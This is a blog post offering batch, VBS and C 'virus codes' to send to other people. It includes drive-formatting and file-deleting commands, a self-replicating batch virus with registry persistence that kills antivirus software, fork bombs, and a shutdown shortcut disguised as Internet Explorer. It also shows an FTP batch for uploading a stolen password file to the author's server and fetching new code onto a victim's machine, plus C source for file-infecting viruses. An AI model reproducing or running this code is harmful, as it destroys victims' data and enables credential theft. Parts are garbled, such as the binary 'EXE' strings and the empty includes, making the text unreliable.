Sunday, July 25, 2010

Batch File Tricks: Making Virus,Funny Things & lots more :

Some Funny Virus Codes
A simple binary codes that can format the system drive ,secondary drives…
Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000
Save As An EXE Any Name Will Do

Send the EXE to People And Infect
Some other interesting formatting codes….

format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

Some more interesting stuff ..

open notepad
erase c:\windows
and save as
FINDOUTANAME.cmd

wat does it do:- will erase c:/windows .

Here is another one which is funny……

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “Your computer has committed suicide. Have a nice day.”


This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat

This code about the computer shutdown:
@echo off
shutdown -s -t 5 -c “Shutdown”

Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

save it as Dell.bat
Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file
One more …
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc.

NOTE :-  Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them …
For this u need a registry updater software .
now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..

Do not try it on your PC. Don’t mess around this is for educational purpose only




Batch VIRUS Killing “ NORTON, LIMEWIRE, EXPLORER, MSN “
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer



The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don’t tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)


Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
end if

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

loop



A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g


A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)


@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it



A batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60



This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want

Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"



Carpet Bomb:
Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.
@ECHO OFF
:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
lease only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer ;)
:theend

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.\
Creating a batch Bomb
Copy and paste the below into notepad and save it as hi.bat (Not .txt)
run it, and enjoy anarchy.


Code:
@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START



A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

How to make a shutdown file and disguise it as something else!
This article is a pretty simple one, maybe most of you guys know already... in case if you don't know, you can play around and make fun...
How to make a shutdown file and disguise it as something else (internet, etc.)
Step 1: Right click on your desktop or wherever you want to make this shutdown file
Step 2: look for new, then shortcut
Step 3: Type shutdown -s -t 10 -c "text here"
note: you can add -f to force close open docuuments
note: after -t you can put any amount of seconds you want before the computer shuts down

Step 4: push next, then name it whatever you like, for an example we will put Internet Explorer
Step 4: Right click on the file you just made and goto properties
Step 5: hit change icon. (This could be under the advanced tab)
Step 6: An error message should pop up letting you know there aren't any pictures for c:\windows\system32. Hit ok
Step 7: A list of icons should show up.. click on the one you think looks the most persuasive according to what you named it. (For example, look for the 'e' icon for internet explorer.
Now your done, see that wasn't that hard! was it?
Put this in the start up folder to make people even MORE mad!


NOTE:- This can easily be stopped by typing shutdown -a in run...

Sending Files Via ftp Batch!
OK, So i made a password stealer that would output a .txt file to the windows folderm i then made a ftp batch that would upload the txt file to my server, so far ive managed to get some passwords but not for anything important, So if you want to know how to make a ftp batch then heres how.
First for example were gonna try upload a file called Test.txt to our server

Upload.bat
ftp -n -i -s:MyUploadFiles.ftp

First make a file called upload.bat and put this in, Now we need to make the myuploadfiles.ftp, if you wanna call it something else then change the myuploadfiles.ftp to what you want but KEEP the .ftp at the end.
Ok now its the myuploadfiles.ftp creating time, or whatever you called it before.
open your-host
user username.spam.com password
ASCII
send test.txt
BI
This is the bit where you have to change the username password and host to what your ftp host is. then change the send test.txt to what file you want to upload, it doesn't have to be a txt file, it can be any one.

Now make sure both files are in the same dir as each other and run the .bat file. check your ftp server and guess whats sitting there! test.txt! So if you want to upload a file from someone's pc, you could use this?

Also theres nothing stopping you from putting in the "get" command in the .ftp, say get download.bat, whenever you want to change what it does make it call it download.bat and shove it on the server, then the victim will download it and be executed.
Folder Replicator Batch VIRUS
Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop


2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.


VIRUS CODES IN “ C “ :-

BATCH & COM VIRUS

#include
#include
#include
#include

struct ffblk ffblk;
main()
{
char old_dir[MAXPATH];
Get_Path(old_dir);            /* Save the old directory  */
Pick_A_Dir();                 /* Find a new directory to */
Infect_Directory();           /* infect and infect it.   */
chdir(old_dir);               /* Return to old directory */
return 0;
}



Pick_A_Dir()
{
int done;
chdir(”..”);                      /* First, Go out a DIR. */
done=findfirst(”*.BAT”,&ffblk,0); /* If no BAT files, try */
/* root and DOS         */
if (done)
{
chdir(”\\”);
done=findfirst(”*.BAT”,&ffblk,0);
if (done) chdir(”\\DOS\\”);
}
return 0;
}


Infect_Directory()
{
int done;

done = findfirst(”*.BAT”,&ffblk,0);
while (!done)                       /* Find all .BAT files */
{                                /* and add code to run */
Do_Batch();                     /* BAT&COM if not      */
done = findnext(&ffblk);        /* already there       */
}

if (findfirst(”BAT&COM.COM”,&ffblk,0)) /* If BAT&COM does  */
{Copy_Virus();}                     /* not exist, then  */
return 0;                              /* copy it into dir.*/
}



Do_Batch()
{
FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];

Get_Path(vpath);            /* Get path for adding path */
/* specifier in commands    */


if (vpath[3]==0) vpath[2]=0; /* Keep path good in root  */

batch=fopen(ffblk.ff_name, “rt+”);
fseek(batch, -11, SEEK_END);
fread(Infection_Buffer,11,1,batch);
Infection_Buffer[11]=0;             /* Terminate String */

if (strcmp(Infection_Buffer,”BAT&COM.COM”)) /* Check if */
{                                   /* Batch is */
fseek(batch, 0, SEEK_END);          /* infected.*/
fprintf(batch,”\n%s\\BAT&COM.COM”,vpath);
}                              /*^- Add command */
/*   to batch    */

fclose(batch);
return 0;
}


Copy_Virus()
{
FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024];              /* Copy the virus to */
/* new directory     */
old_virus=fopen(_argv[0],”rb”);
new_virus=fopen(”BAT&COM.COM”,”wb”);

write_length=1024;

while (write_length==1024)
{
write_length=fread(copy_buffer,1,1024,old_virus);
fwrite(copy_buffer,write_length,1,new_virus);
}
fclose(old_virus);
fclose(new_virus);
return 0;
}


Get_Path(char *path)
{
strcpy(path, “A:\\”);
path[0] =’A’ + getdisk();    /* Returns current path */
getcurdir(0, path+3);
return 0;
}
-       – - —————–End of Code———————— – - -



BLACK WOLF VIRUS

/*  It will infect all .COM files in the current directory  */

#include
#include
#include

FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;

main()
{
done = findfirst(”*.COM”,&ffblk,0);   /* Find a .COM file */
while (!done)               /* Loop for all COM’s in DIR*/
{
printf(”Infecting  %s\n”, ffblk.ff_name);    /* Inform user */
Virus=fopen(_argv[0],”rb”);          /* Open infected file  */
Host=fopen(ffblk.ff_name,”rb+”);     /* Open new host file  */

x=9504;                               /* Virus size – must   */
/* be correct for the  */
/* compiler it is made */
/* on, otherwise the   */
/* entire virus may not*/
/* be copied!!         */
while (x>256)                         /* OVERWRITE new Host  */
{                                 /* Read/Write 256 byte */
fread(buff,256,1,Virus);          /* chunks until bytes  */
fwrite(buff,256,1,Host);          /* left < 256          */
x-=256;
}
fread(buff,x,1,Virus);                /* Finish off copy     */
fwrite(buff,x,1,Host);
fcloseall();                          /* Close both files and*/
done = findnext(&ffblk);              /* go for another one. */
}
/* Activation would go */
/* here                */
return (0);                             /* Terminate           */
}


OVERWRITE VIRUS CODE
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst(”*.exe”,f,0);
while(!done)
{
virus=fopen(argv[0],”rb”);//open the virus in read mode
host=fopen(f->ff_name,”rb+”);//open the host file in r/w mode

for(;fread(buffer,512,1,virus)==1;)

fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf(”infecting %s
“,f->ff_name);
done=findnext(f);
}
}
while(!chdir(”..”));
printf(”For any querry contact
Anuj Parihar;anujpixel@gmail.com“);


REPLICATION VIRUS

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Rakesh_dwivedi(rakeshdwivedi21@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

No comments:

Post a Comment